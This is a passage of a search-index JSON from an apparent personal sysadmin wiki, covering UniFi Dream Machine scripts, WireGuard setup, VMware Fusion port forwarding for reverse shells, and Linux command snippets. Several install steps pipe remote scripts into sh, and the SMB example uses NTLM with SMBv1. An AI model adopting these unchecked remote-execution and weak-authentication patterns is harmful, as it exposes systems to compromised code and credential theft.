", "tags": ["udm", "ubiquiti", "unifi"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/persistent-boot-script/#features", "title": "Features", "text": " Allows you to run a shell script at S95 anytime your UDM starts / reboots Persists through reboot and firmware updates! It is able to do this because Ubiquiti caches all debian package installs on the UDM in /data, then re-installs them on reset of unifi-os container. ", "tags": ["udm", "ubiquiti", "unifi"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/persistent-boot-script/#install", "title": "Install", "text": "You can execute in UDM/Pro/SE and UDR with:
curl -fsL \"https://raw.githubusercontent.com/unifi-utilities/unifios-utilities/HEAD/on-boot-script/remote_install.sh\" | /bin/sh\n
This is a force to install script so will uninstall any previous version and install on_boot keeping your on boot files.
This will also install CNI Plugins & CNI Bridge scripts. If you are using UDMSE/UDR remember that you must install podman manually because there is no podman.
For manual installation see: The Github Readme
", "tags": ["udm", "ubiquiti", "unifi"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/persistent-ssh-keys/", "title": "UDM Persistent SSH Keys", "text": "UDM will discard any Authorized Keys for SSH every reboot or firmware upgrade. This script will allow you to persist your SSH keys in the UDM and survive reboots.
Github Repository: UDM Persistent SSH Keys
", "tags": ["udm", "ubiquiti", "unifi"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/persistent-ssh-keys/#changelog", "title": "Changelog", "text": " 2023-02-22 - Fixed support for UDM Pro Firmware 1.x and 2.x and 3.x - Must reinstall the script after upgrade from 1.x to 2.x ", "tags": ["udm", "ubiquiti", "unifi"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/persistent-ssh-keys/#persistence-on-reboot", "title": "Persistence on Reboot", "text": "This script need to run every time the system is rebooted since the /root/.ssh/authorized_keys overwrites every boot. This can be accomplished with a boot script. Flow this guide: UDM / UDMPro Boot Script
", "tags": ["udm", "ubiquiti", "unifi"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/persistent-ssh-keys/#compatibility", "title": "Compatibility", "text": " Tested on UDM PRO UDM Pro doesn't support ed25519 SSH Keys ", "tags": ["udm", "ubiquiti", "unifi"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/persistent-ssh-keys/#installation", "title": "Installation", "text": "The script was tested on UDM PRO
(!) Depending on firmware your $DATA_DIR
will be /mnt/data
(Firmware 1.x) or /data
(Firmware 2.x and 3.x)
curl -s https://raw.githubusercontent.com/fire1ce/UDM-Persistent-SSH-Keys/main/install.sh | sh\n
Add you public RSA keys to:
$DATA_DIR/ssh/authorized_keys\n
", "tags": ["udm", "ubiquiti", "unifi"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/persistent-ssh-keys/#uninstall", "title": "Uninstall", "text": "Delete the 99-ssh-keys.sh file
rm -rf $DATA_DIR/on_boot.d/99-ssh-keys.sh\n
Delete your authorized_keys file
rm -rf $DATA_DIR/ssh/authorized_keys\n
", "tags": ["udm", "ubiquiti", "unifi"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/persistent-ssh-keys/#usage", "title": "Usage", "text": "At boot the script with read the $DATA_DIR/ssh/authorized_keys file and add the content to UDM's /root/.ssh/authorized_keys
Manual run:
$DATA_DIR/on_boot.d/99-ssh-keys.sh\n
", "tags": ["udm", "ubiquiti", "unifi"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/udm-better-fan-speeds/", "title": "UDM Better Fan Speeds", "text": "Github Repository: UDM Better Fan Speeds
", "tags": ["udm", "ubiquiti", "unifi"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/udm-better-fan-speeds/#repository-deprecation-notice", "title": "Repository Deprecation Notice", "text": " Repository Deprecation Notice: This project is now deprecated and archived due to the release of UniFi's firmware v2.x and v3.x for Dream Machnines, which natively fix the fan speed issues.
This repository only works with firmware 1.x. UDM-PRO Please consider upgrading your firmware for improved functionality.
", "tags": ["udm", "ubiquiti", "unifi"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/udm-better-fan-speeds/#what-it-does", "title": "What It Does", "text": "It stops the build in service that monitors the thermal values, fan speed and connection of a HDD/SSD. After that it sets the thermal/fan chip (adt7475) to automatic mode. Once that is done it changes the thermal and fan threshold values specified in the script. If you like, you can change the values to your own preferences.
", "tags": ["udm", "ubiquiti", "unifi"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/udm-better-fan-speeds/#compatibility", "title": "Compatibility", "text": "", "tags": ["udm", "ubiquiti", "unifi"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/udm-better-fan-speeds/#warning", "title": "WARNING", "text": "USE THIS ON YOUR OWN RISK. If you apply inappropriate settings with this script, you will possibly (soft- or hard-) brick your equipment.
", "tags": ["udm", "ubiquiti", "unifi"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/udm-better-fan-speeds/#requirements", "title": "Requirements", "text": "Persistence on Reboot is required. This can be accomplished with a boot script. Flow this guide: UDM Boot Script
", "tags": ["udm", "ubiquiti", "unifi"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/udm-better-fan-speeds/#installation", "title": "Installation", "text": "curl -s https://raw.githubusercontent.com/fire1ce/UDM-Better-Fan-Speeds/main/install.sh | sh\n
", "tags": ["udm", "ubiquiti", "unifi"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/udm-better-fan-speeds/#configuration", "title": "Configuration", "text": "You can edit the fan-speed settings at
/mnt/data/on_boot.d/11-udm-better-fan-speed.sh\n
", "tags": ["udm", "ubiquiti", "unifi"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/udm-better-fan-speeds/#credit", "title": "Credit", "text": "Based on renedis/ubnt-auto-fan-speed by ReneDIS. Thanks
", "tags": ["udm", "ubiquiti", "unifi"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/udm-cloudflare-ddns/", "title": "UDM Cloudflare DDNS", "text": "Github Repository: UDM Cloudflare DDNS
", "tags": ["udm", "ubiquiti", "unifi", "cloudflare"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/udm-cloudflare-ddns/#change-log", "title": "Change Log", "text": " 2022-22-2 - Major Update for UDM v2.x and v3.x ", "tags": ["udm", "ubiquiti", "unifi", "cloudflare"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/udm-cloudflare-ddns/#what-it-does", "title": "What It Does", "text": "This will allow to to span a container with podman
to handle DDNS updates for the main internet IP address. The container will run in the background without any system permissions.
", "tags": ["udm", "ubiquiti", "unifi", "cloudflare"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/udm-cloudflare-ddns/#compatibility", "title": "Compatibility", "text": "", "tags": ["udm", "ubiquiti", "unifi", "cloudflare"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/udm-cloudflare-ddns/#requirements", "title": "Requirements", "text": "Persistence on Reboot is required. This can be accomplished with a boot script. Flow this guide: UDM Boot Script
", "tags": ["udm", "ubiquiti", "unifi", "cloudflare"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/udm-cloudflare-ddns/#creating-a-cloudflare-api-token", "title": "Creating a Cloudflare API token", "text": "To create a CloudFlare API token for your DNS zone go to https://dash.cloudflare.com/profile/api-tokens and follow these steps:
Click Create Token Select Create Custom Token Provide the token a name, for example, example.com-dns-zone
Grant the token the following permissions: - Zone - DNS - Edit Set the zone resources to: - Include - Specific Zone - example.com
Complete the wizard. Use the generated token at the API_KEY
variable for the container ", "tags": ["udm", "ubiquiti", "unifi", "cloudflare"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/udm-cloudflare-ddns/#installation", "title": "Installation", "text": "curl -s https://raw.githubusercontent.com/fire1ce/UDM-Cloudflare-DDNS/main/install.sh | sh\n
", "tags": ["udm", "ubiquiti", "unifi", "cloudflare"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/udm-cloudflare-ddns/#configuration", "title": "Configuration", "text": "will be updated soon
", "tags": ["udm", "ubiquiti", "unifi", "cloudflare"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/wireguard-vpn/", "title": "Wireguard VPN", "text": "WireGuard\u00ae is an extremely simple yet fast and modern VPN that utilizes state-of-the-art cryptography. It aims to be faster, simpler, leaner, and more useful than IPsec, while avoiding the massive headache. It intends to be considerably more performant than OpenVPN. WireGuard is designed as a general purpose VPN for running on embedded interfaces and super computers alike, fit for many different circumstances. Initially released for the Linux kernel, it is now cross-platform (Windows, macOS, BSD, iOS, Android) and widely deployable. It is currently under heavy development, but already it might be regarded as the most secure, easiest to use, and simplest VPN solution in the industry.
Github Repository: wireguard-vyatta-ubnt
A guide on installing and using the WireGuard kernel module and tools on Ubiquiti UnifiOS routers (UDM, UDR, and UXG).
", "tags": ["udm", "ubiquiti", "unifi", "wireguard"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/wireguard-vpn/#installation", "title": "Installation", "text": " Download the latest release for UnifiOS. Use the correct link in the command below
curl -Lfo UnifiOS-wireguard.tar.gz https://github.com/WireGuard/wireguard-vyatta-ubnt/releases/download/${RELEASE}/UnifiOS-${RELEASE}.tar.gz\n
Extract the files to your data directory and run the setup script.
For the UDM/P or UXG-Pro, extract the files into /mnt/data/wireguard
tar -C /mnt/data -xvf UnifiOS-wireguard.tar.gz\n/mnt/data/wireguard/setup_wireguard.sh\n
For the UDM-SE or UDR, extract the files into /data/wireguard
tar -C /data -xvf UnifiOS-wireguard.tar.gz\n/data/wireguard/setup_wireguard.sh\n
The setup script will load the wireguard module, and setup the symbolic links for the wireguard tools (wg-quick and wg). You can run dmesg
to verify the kernel module was loaded. You should see something like the following:
[13540.520120] wireguard: WireGuard 1.0.20210219 loaded. See www.wireguard.com for information.\n[13540.520126] wireguard: Copyright (C) 2015-2019 Jason A. Donenfeld <Jason@zx2c4.com>. All Rights Reserved.\n
Now you should be able to create a wireguard interface. Please see usage below.
", "tags": ["udm", "ubiquiti", "unifi", "wireguard"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/wireguard-vpn/#compatibility", "title": "Compatibility", "text": "The wireguard module and tools included in this package have been tested on the following Ubiquiti devices:
Unifi Dream Machine (UDM) and UDM-Pro 0.5.x, 1.9.x, 1.10.x, 1.11.x. UDM-SE and Unifi Dream Router (UDR) 2.2.x UniFi Next-Gen Gateway (UXG-Pro) 1.11.x Note that for the UDM, UDM Pro, and UXG-Pro, Ubiquiti includes the wireguard module in the official kernel since firmware 1.11.0-14, but doesn't include the WireGuard tools. The setup script in this package will try to load the built-in wireguard module if it exists first.
", "tags": ["udm", "ubiquiti", "unifi", "wireguard"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/wireguard-vpn/#upgrade", "title": "Upgrade", "text": " Unload the wireguard module.
rmmod wireguard\n
Re-install wireguard by following the Installation instructions above to get the latest version.
", "tags": ["udm", "ubiquiti", "unifi", "wireguard"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/wireguard-vpn/#uninstallation", "title": "Uninstallation", "text": " Delete the wireguard files from your data directory.
rm -rf /mnt/data/wireguard\n
Delete the wireguard tools and any boot scripts.
rm /usr/bin/wg /usr/bin/wg-quick\n
", "tags": ["udm", "ubiquiti", "unifi", "wireguard"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/wireguard-vpn/#usage", "title": "Usage", "text": "Read the documentation on WireGuard.com for general WireGuard concepts. Here is a simple example of a wireguard server configuration for UnifiOS.
Create the server and client public/private key pairs by running the following. This will create the files privatekey_server
, publickey_server
and privatekey_client1
, publickey_client1
. These contain the public and private keys. Store these files somewhere safe.
wg genkey | tee privatekey_server | wg pubkey > publickey_server\nwg genkey | tee privatekey_client1 | wg pubkey > publickey_client1\n
On your UDM/UDR, create a wireguard config under /etc/wireguard
named wg0.conf
. Here is an example server config. Remember to use the correct server private key and the client public key.
[Interface]\nAddress = 10.0.2.1/24\nPrivateKey = <server's privatekey>\nListenPort = 51820\n\n[Peer]\nPublicKey = <client's publickey>\nAllowedIPs = 10.0.2.2/32\n
For your client, you will need a client config like the following example. Remember to use the correct client private key and the server public key.
[Interface]\nAddress = 10.0.2.2/32\nPrivateKey = <client's privatekey>\n\n[Peer]\nPublicKey = <server's publickey>\nEndpoint = <server's ip>:51820\nAllowedIPs = 10.0.2.0/24\n
Adjust Address to change the IP of the client. Adjust AllowedIPs to set what your client should route through the tunnel. Set to 0.0.0.0/0,::/0
to route all the client's Internet through the tunnel. See the WireGuard documentation for more information. Note each different client requires their own private/public key pair, and the public key must be added to the server's WireGuard config as a separate Peer. To bring the tunnel up, run wg-quick up <config>
. Verify the tunnel received a handshake by running wg
. wg-quick up /etc/wireguard/wg0.conf\n
To bring down the tunnel, run wg-quick down <config>
. wg-quick down /etc/wireguard/wg0.conf\n
In your UniFi Network settings, add a WAN_LOCAL (or Internet Local) firewall rule to ACCEPT traffic destined to UDP port 51820 (or your ListenPort if different). Opening this port in the firewall is needed so remote clients can access the WireGuard server. ", "tags": ["udm", "ubiquiti", "unifi", "wireguard"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/wireguard-vpn/#routing", "title": "Routing", "text": "The AllowedIPs parameter in the wireguard config allows you to specify which destination subnets to route through the tunnel.
If you want to route router-connected clients through the wireguard tunnel based on source subnet or source VLAN, you need to set up policy-based routing. Currently, there is no GUI support for policy-based routing in UnifiOS, but it can be set up in SSH by using ip route
to create a custom routing table, and ip rule
to select which clients to route through the custom table.
For a script that makes it easy to set-up policy-based routing rules on UnifiOS, see the split-vpn project.
", "tags": ["udm", "ubiquiti", "unifi", "wireguard"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/wireguard-vpn/#binaries", "title": "Binaries", "text": "Prebuilt binaries are available under releases.
The binaries are statically linked against musl libc to mitigate potential issues with UnifiOS' glibc.
", "tags": ["udm", "ubiquiti", "unifi", "wireguard"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/wireguard-vpn/#persistence-on-reboot", "title": "Persistence on Reboot", "text": "The setup script must be run every time the system is rebooted to link the wireguard tools and load the module. This can be accomplished with a boot script.
For the UDM or UDM Pro, install UDM Utilities on-boot-script by following the instructions here, then create a boot script under /mnt/data/on_boot.d/99-setup-wireguard.sh
and fill it with the following contents. Remember to run chmod +x /mnt/data/on_boot.d/99-setup-wireguard.sh
afterwards.
Click here to see the boot script.
#!/bin/sh\n/mnt/data/wireguard/setup_wireguard.sh\n
For the UDM-SE or UDR, create a systemd boot service to run the setup script at boot. Create a service file under /etc/systemd/system/setup-wireguard.service
and fill it with the following contents. After creating the service, run systemctl daemon-reload && systemctl enable setup-wireguard
to enable the service on boot. Click here to see the boot service.
[Unit]\nDescription=Run wireguard setup script\nWants=network.target\nAfter=network.target\n\n[Service]\nType=oneshot\nExecStart=sh -c 'WGDIR=\"$(find /mnt/data/wireguard /data/wireguard -maxdepth 1 -type d -name \"wireguard\" 2>/dev/null | head -n1)\"; \"$WGDIR/setup_wireguard.sh\"'\n\n[Install]\nWantedBy=multi-user.target\n
Note this only adds the setup script to start at boot. If you also want to bring your wireguard interface up at boot, you will need to add another boot script with your wg-quick up
command.
", "tags": ["udm", "ubiquiti", "unifi", "wireguard"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/wireguard-vpn/#troubleshooting", "title": "Troubleshooting", "text": "Setup script returns error \"Unsupported Kernel version XXX\" * The wireguard package does not contain a wireguard module built for your firmware or kernel version, nor is there a built-in module in your kernel. Please open an issue and report your version so we can try to update the module. wg-quick up returns error \"unable to initialize table 'raw'\" * Your kernel does not have the iptables raw module. The raw module is only required if you use `0.0.0.0/0` or `::/0` in your wireguard config's AllowedIPs. A workaround is to instead set AllowedIPs to `0.0.0.0/1,128.0.0.0/1` for IPv4 or `::/1,8000::/1` for IPv6. These subnets cover the same range but do not invoke wg-quick's use of the iptables raw module.", "tags": ["udm", "ubiquiti", "unifi", "wireguard"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/wireguard-vpn/#credits", "title": "Credits", "text": "Original work to compile WireGuard on UnifiOS by @tusc (wireguard-kmod).
\"WireGuard\" and the \"WireGuard\" logo are registered trademarks of Jason A. Donenfeld.
", "tags": ["udm", "ubiquiti", "unifi", "wireguard"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/wireguard-vpn/#the-built-in-gateway-dns-does-not-reply-to-requests-from-the-wireguard-tunnel", "title": "The built-in gateway DNS does not reply to requests from the WireGuard tunnel", "text": " The built-in dnsmasq on UnifiOS is configured to only listen for requests from specific interfaces. The wireguard interface name (e.g.: wg0) needs to be added to the dnsmasq config so it can respond to requests from the tunnel. You can run the following to add wg0 to the dnsmasq interface list: echo \"interface=wg0\" > /run/dnsmasq.conf.d/custom_listen.conf\nkillall -9 dnsmasq\n
You can also add those commands to PostUp in your wireguard config's Interface section to automatically run them when the tunnel comes up, e.g.: PostUp = echo \"interface=%i\" > /run/dnsmasq.conf.d/custom_listen.conf; killall -9 dnsmasq\n PreDown = rm -f /run/dnsmasq.conf.d/custom_listen.conf; killall -9 dnsmasq\n
", "tags": ["udm", "ubiquiti", "unifi", "wireguard"]}, {"location": "infrastructure/vmware/vmware-fusion/", "title": "VMware Fusion", "text": "", "tags": ["vmware", "vmware-fusion"]}, {"location": "infrastructure/vmware/vmware-fusion/#port-forwarding-for-reverse-shells", "title": "Port Forwarding for Reverse Shells", "text": "If you use your vm as NAT network \"Shared with My Mac\" You can forward a port to your host macOS machine.
The network configuration files are stored in their respective folders within the VMware Fusion preferences folder.
/Library/Preferences/VMware\\ Fusion/\n
In order to find the right network config you can inspect the dhcpd.conf inside of vmnet* folders.
cat dhcpd.conf\n
After you found the correct network it should contain a nat.conf file Edit the (with sudo privileges) nat.conf, For UDP protocol edit the section [incomingudp] for TCP protocol edit the [incomingtcp]
In the next example we will forward port 4444 from the VM to port 4444 on the host. You can forward any port to any port as you like.
After you saved the configuration nat.conf file you must restart VMware's network services
You do NOT need to restart the Virtual Machine
sudo /Applications/VMware\\ Fusion.app/Contents/Library/vmnet-cli --stop\nsudo /Applications/VMware\\ Fusion.app/Contents/Library/vmnet-cli --start\n
If you want to test the port forwarding is working as it should here's an example of running simple python webserver on the vm on port 4444 we configured before:
python -m SimpleHTTPServer 4444\n
Now you can test it on the Host machine by browsing to http://localhost:4444
or http://127.0.0.1:4444
", "tags": ["vmware", "vmware-fusion"]}, {"location": "linux/files-handling/", "title": "Files Handling", "text": "", "tags": ["linux", "files-handling"]}, {"location": "linux/files-handling/#ncurses-disk-usage", "title": "NCurses Disk Usage", "text": "Ncdu is a disk usage analyzer with an ncurses interface.
apt-get install ncdu\n
", "tags": ["linux", "files-handling"]}, {"location": "linux/files-handling/#delete-large-file-list-argument-list-too-long", "title": "Delete Large File List - Argument list too long", "text": "find . -name '*'|xargs rm\n
", "tags": ["linux", "files-handling"]}, {"location": "linux/files-handling/#change-permissions-chmod-to-folders-and-files", "title": "Change permissions (chmod) to folders and files", "text": "find . -type d -exec chmod 755 {} +\nfind . -type f -exec chmod 644 {} +\n
", "tags": ["linux", "files-handling"]}, {"location": "linux/files-handling/#recursively-chown-user-and-group", "title": "Recursively chown user and group", "text": "chown -R user:group /some/path/here\n
", "tags": ["linux", "files-handling"]}, {"location": "linux/files-handling/#recursively-chmod-to-775664", "title": "Recursively chmod to 775/664", "text": "chmod -R a=,a+rX,u+w,g+w /some/path/here\n
^ ^ ^ ^ adds write to group\n | | | adds write to user\n | | adds read to all and execute to all folders (which controls access)\n| sets all to `000`\n
", "tags": ["linux", "files-handling"]}, {"location": "linux/files-handling/#find-uidgid-for-user", "title": "Find UID/GID for user", "text": "id <username>\n
", "tags": ["linux", "files-handling"]}, {"location": "linux/general-snippets/", "title": "General Snippets", "text": "", "tags": ["linux", "snippets"]}, {"location": "linux/general-snippets/#disable-ssh-login-welcome-message", "title": "Disable SSH Login Welcome Message", "text": "To disable
touch ~/.hushlogin\n
To re-enable
rm -rf ~/.hushlogin\n
", "tags": ["linux", "snippets"]}, {"location": "linux/general-snippets/#change-sudo-password-requirement-timeout-in-linux", "title": "Change Sudo Password Requirement Timeout In Linux", "text": "To change sudo password timeout limit in Linux, run:
sudo visudo\n
This command will open the\u00a0/etc/sudoers\u00a0file in\u00a0nano\u00a0editor.
Find the following line:
Defaults env_reset\n
Change it like below the 30 is the number of minutes you want to set the timeout to.
Defaults env_reset, timestamp_timeout=30\n
", "tags": ["linux", "snippets"]}, {"location": "linux/general-snippets/#redirect-output-to-a-file-and-stdout-with-tee", "title": "Redirect Output to a File and Stdout With tee", "text": "The command you want is named tee
:
foo | tee output.file\n
For example, if you only care about stdout:
ls -a | tee output.file\n
If you want to include stderr, do:
program [arguments...] 2>&1 | tee outfile\n
2>&1 redirects channel 2 (stderr/standard error) into channel 1 (stdout/standard output), such that both are written to stdout. It is also directed to the given output file by the tee command.
Furthermore, if you want to append to the log file, use tee -a as:
program [arguments...] 2>&1 | tee -a outfile\n
", "tags": ["linux", "snippets"]}, {"location": "linux/general-snippets/#add-permanent-path-to-application", "title": "Add Permanent Path to Application", "text": "First find the location of the Application/Service:
find / -name ApplicationName\n
Go to the path where the application is located
cd \"../../../ApplicationName\"\n
Run this command for ZSH:
echo 'export PATH=\"'$(pwd)':$PATH\"' >> ~/.zshrc && source ~/.zshrc\n
Run this command for \"shell Profile\":
echo 'export PATH=\"'$(pwd)':$PATH\"' >> ~/.profile && source ~/.profile\n
Run this command for \"shell\":
echo 'export PATH=\"'$(pwd)':$PATH\"' >> ~/.shellrc && source ~/.shellrc\n
", "tags": ["linux", "snippets"]}, {"location": "linux/general-snippets/#create-symbolic-links", "title": "Create Symbolic Links", "text": "To create a symbolic link in Unix/Linux, at the terminal prompt, enter:
ln -s source_file target_file\n
to remove symbolic link use the rm
command on the link
", "tags": ["linux", "snippets"]}, {"location": "linux/general-snippets/#open-last-edited-file", "title": "Open Last Edited File", "text": "less `ls -dx1tr /usr/local/cpanel/logs/cpbackup/*|tail -1`\n
", "tags": ["linux", "snippets"]}, {"location": "linux/general-snippets/#kill-process-that-runs-more-than-x-time", "title": "Kill Process That Runs More Than X Time", "text": "Kill cgi after 30 secs:
for i in `ps -eo pid,etime,cmd|grep cgi|awk '$2 > \"00:30\" {print $1}'`; do kill $i; done\n
", "tags": ["linux", "snippets"]}, {"location": "linux/locales-time-zone/", "title": "Locales & Timezone", "text": "", "tags": ["linux", "locales", "timezone"]}, {"location": "linux/locales-time-zone/#fix-locales-fix-bash-local-error", "title": "Fix Locales (Fix Bash Local Error)", "text": "Set the Locale, Find the en_US.UTF-8 in the list and select it, at the following screen select it.
dpkg-reconfigure locales\n
", "tags": ["linux", "locales", "timezone"]}, {"location": "linux/locales-time-zone/#set-system-time-with-time-zone-timedatectl-ntp", "title": "Set System Time With Time Zone (timedatectl ntp)", "text": "Find your time zone with timedatectl list-timezones use grep for easier results:
timedatectl list-timezones | grep \"Toronto\"\n
The output should look like this:
America/Toronto\n
Now set the Time Zone and active it.
timedatectl set-timezone Asia/Jerusalem\ntimedatectl set-ntp true\n
Now test timedatectl status
timedatectl status\n
Check your system time
date\n
", "tags": ["linux", "locales", "timezone"]}, {"location": "linux/lvm-partitions/", "title": "LVM Partitions", "text": "", "tags": ["linux", "lvm"]}, {"location": "linux/lvm-partitions/#removing-lvm-partition-and-merging-in-to-root-partition", "title": "Removing LVM Partition and Merging In To / (root partition)", "text": "Find out the names of the partition with df
df\n
You need to unmount the partition before you can delete it, and back up the data of the partition you would like to delete. This example will use "centos-home" as the partition that will be merged into the root partition.
umount -a\nlvremove /dev/mapper/centos-home\nlvextend -l +100%FREE -r /dev/mapper/centos-root\n
After the merging and before mounting you should remove the partition from fstab
nano /etc/fstab\nmount -a\n
", "tags": ["linux", "lvm"]}, {"location": "linux/memory-swap/", "title": "Memory & Swap", "text": "", "tags": ["linux"]}, {"location": "linux/memory-swap/#who-uses-ram", "title": "Who Uses RAM", "text": "ps aux | awk '{print $6/1024 \" MB\\t\\t\" $11}' | sort -n\n
", "tags": ["linux"]}, {"location": "linux/memory-swap/#who-is-using-swap-memory", "title": "Who Is Using Swap Memory", "text": "grep VmSwap /proc/*/status 2>/dev/null | sort -nk2 | tail -n5\n
", "tags": ["linux"]}, {"location": "linux/memory-swap/#clear-cache-and-swap", "title": "Clear Cache and Swap", "text": "echo 3 > /proc/sys/vm/drop_caches && swapoff -a && swapon -a\n
", "tags": ["linux"]}, {"location": "linux/services-and-daemons/", "title": "Services & Daemons", "text": "In Linux, a service is a program that runs in the background and performs a specific function. A daemon is a type of service that also runs in the background and often starts at boot time. These processes can be controlled using the systemctl or service command. Services and daemons are an important part of the Linux operating system, as they provide various functions and services that allow the system to run smoothly. There are many different types of services and daemons that can be found on a typical Linux system, and you can find more information about them in the documentation for your specific distribution.
"}, {"location": "linux/services-and-daemons/#useful-systemctl-commands", "title": "Useful systemctl
commands", "text": "Start the specified service.
systemctl start <service>\n
Stop the specified service.
systemctl stop <service>\n
Restart the specified service.
systemctl restart <service>\n
Enable the specified service to start automatically at boot time.
systemctl enable <service>\n
Disable the specified service from starting automatically at boot time.
systemctl disable <service>\n
Show the current status and runtime information for the specified service.
systemctl status <service>\n
Show the dependencies for the specified service.
systemctl list-dependencies <service>\n
List all installed unit files on the system.
systemctl list-units --all\n
"}, {"location": "linux/services-and-daemons/#display-running-services", "title": "Display Running Services", "text": "The systemctl command with the grep command will display a list of all running services and daemons on your Linux system. The grep command will search the output of systemctl for the string \"running\" and only display the lines that contain that string.
systemctl | grep running\n
For more readable output:
systemctl --no-pager | grep running | column -t\n
"}, {"location": "linux/services-and-daemons/#display-enabled-services", "title": "Display Enabled Services", "text": "systemctl list-unit-files --state=enabled
is a command that shows a list of unit files that are currently enabled on the system. The --state option specifies the state of the unit files that you want to see. By using --state=enabled, you will see only unit files that are enabled and will be started automatically when the system boots.
systemctl list-unit-files --state=enabled\n
"}, {"location": "linux/smb-mount-autofs/", "title": "SMB Mount With autofs", "text": "Install autofs cifs-utils
apt install -y autofs cifs-utils\n
Edit the auto.cifs file
nano /etc/auto.cifs\n
Add this to the file: (\"media\" - is any name for your mount)
media -fstype=cifs,rw,noperm,vers=3.0,credentials=/etc/.credentials.txt ://oscar.3os.re/active-share/media\n
Create credentials file
nano /etc/.credentials.txt\n
Add your credentials for the SMB mount:
username=YourUser\npassword=YourPassword\n
Exit and save:
nano /etc/auto.master\n
At the end of the file add: (\"/mnt\" - mount location, /etc/auto.cifs your config for mounting the SMB Share)
/mnt /etc/auto.cifs --timeout=600 --ghost\n
Save and exit. Test the mounting.
systemctl start autofs\ncd /mnt/media/\nls\n
You should see the mount over there. Enable autofs on boot:
systemctl enable autofs\n
", "tags": ["smb", "share", "autofs", "mount"]}, {"location": "linux/smb-mount-autofs/#smb-mount-on-linux-with-credentials", "title": "SMB Mount on Linux With Credentials", "text": "sudo apt-get install cifs-utils\nnano ~/.smbcredentials\n
add this to the config.
username=msusername\npassword=mspassword\n
Save the file, exit the editor. Change the permissions of the file to prevent unwanted access to your credentials:
chmod 600 ~/.smbcredentials\n
Then edit your /etc/fstab file (with root privileges) to add this line (replacing the insecure line in the example above, if you added it):
//servername/sharename /media/windowsshare cifs vers=1.0,credentials=/home/ubuntuusername/.smbcredentials,iocharset=utf8,sec=ntlm 0 0\n
Save the file, exit the editor.
Finally, test the fstab entry by issuing:
sudo mount -a\n
If there are no errors, you should test how it works after a reboot. Your remote share should mount automatically.
", "tags": ["smb", "share", "autofs", "mount"]}, {"location": "linux/ssh-hardening-with-rsa-keys/", "title": "SSH Hardening with SSH Keys", "text": "", "tags": ["linux", "ssh", "rsa"]}, {"location": "linux/ssh-hardening-with-rsa-keys/#generating-a-new-ssh-key", "title": "Generating a new SSH key", "text": "RSA 4096
ssh-keygen -t rsa -b 4096 -C \"your_email@example.com\"\n
Ed25519 Algorithm
ssh-keygen -t ed25519 -C \"your_email@example.com\"\n
", "tags": ["linux", "ssh", "rsa"]}, {"location": "linux/ssh-hardening-with-rsa-keys/#automatic-copy-rsa-key-to-the-server", "title": "Automatic Copy RSA Key to The Server", "text": "ssh-copy-id -i ~/.ssh/id_rsa.pub user@host\n
", "tags": ["linux", "ssh", "rsa"]}, {"location": "linux/ssh-hardening-with-rsa-keys/#manually-copy-rsa-key-to-the-server", "title": "Manually Copy RSA Key to The Server", "text": "ssh to the host (do not close this connection
)
mkdir -p ~/.ssh && touch .ssh/authorized_keys\n
copy your public key usually located at ~/.ssh/id_rsa.pub
echo PUBLIC_KEY_STRING >> ~/.ssh/authorized_keys\n
", "tags": ["linux", "ssh", "rsa"]}, {"location": "linux/ssh-hardening-with-rsa-keys/#ssh-hardening-disable-password-login", "title": "SSH Hardening - Disable Password Login", "text": "edit /etc/ssh/sshd_config
change:
#PasswordAuthentication yes\n
to
PasswordAuthentication no\n
save&exit
restart ssh service:
sudo systemctl restart ssh\n
Danger
Open a new SSH session and test login with RSA Keys before closing the existing connection
", "tags": ["linux", "ssh", "rsa"]}, {"location": "linux/ssh-hardening-with-rsa-keys/#optional-change-ssh-port", "title": "Optional: change ssh port", "text": "edit /etc/ssh/sshd_config
change the port to a desired one
port 1337\n
save&exit
restart ssh service:
sudo systemctl restart ssh\n
", "tags": ["linux", "ssh", "rsa"]}, {"location": "linux/ssh-hardening-with-rsa-keys/#add-privet-id_rsa-key-to-server", "title": "Add Privet id_rsa key to Server", "text": "copy the id_rsa key to ~/.ssh folder
cd ~/.ssh\nsudo ssh-agent bash\nssh-add id_rsa\n
", "tags": ["linux", "ssh", "rsa"]}, {"location": "linux/Network/identify-nics/", "title": "Identify Physical Network Interfaces", "text": "", "tags": ["linux", "network"]}, {"location": "linux/Network/identify-nics/#the-problem", "title": "The Problem", "text": "Servers usually have a number of physical network interfaces. The network interfaces names in linux host usually won't tell you much about the which physical network interface corresponds to the interface name. Therefor, it creates a problem when you want to use a specific network interface for a specific purpose but you don't know which physical network interface corresponds to the interface name.
